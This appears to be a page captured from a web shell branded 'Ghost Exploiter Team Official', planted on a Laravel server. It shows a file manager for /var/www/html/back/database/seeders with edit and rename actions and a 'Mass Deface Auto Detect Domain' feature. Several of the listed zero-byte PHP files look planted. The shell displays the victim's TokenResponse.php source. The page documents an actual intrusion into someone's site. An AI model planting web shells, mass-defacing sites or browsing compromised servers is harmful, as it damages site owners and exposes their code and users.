Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
database
/
seeders
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.htaccess
0KB
edt
ren
ProjectSeeder-202601280
...
0KB
edt
ren
ProjectSeeder.php
2.147KB
edt
ren
RoleTableSeeder-2026012
...
1.04KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
SortSeeder.php
1.243KB
edt
ren
TokenResponse.php
1.604KB
edt
ren
accounts.php
0KB
edt
ren
api.php
1.377KB
edt
ren
auth.php
0KB
edt
ren
console.php
0KB
edt
ren
debugbar.php
0KB
edt
ren
services.php
0KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; use App\BaseClasses\BaseResponse; use Illuminate\Http\{JsonResponse}; class TokenResponse extends BaseResponse { private int $status; private string $message; private string $token; private int $userId; public function __construct( int $status, string $message, string $token, int $userId ) { $this->status = $status; $this->message = $message; $this->token = $token; $this->userId = $userId; } public function toResponse($request): JsonResponse { return new JsonResponse( data: [ 'status' => $this->status, 'data' => [ 'message' => __(key: $this->message), 'token' => __(key: $this->token), 'userId' => __(key: $this->userId), ], 'metadata' => [ 'request_id' => str()->uuid()->toString(), 'timestamp' => now()->toIso8601String() ], ], status: $this->status ); } public static function example(): array { return [ 'data' => [ 'message' => 'Token generated successfully', 'token' => 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpvaG4iOiIxMjM0NTQ4ODM3ODA2IiwidmFsdWUifQ...', 'userId' => 123, ], 'metadata' => [ 'request_id' => str()->uuid()->toString(), 'timestamp' => now()->toIso8601String() ] ]; } }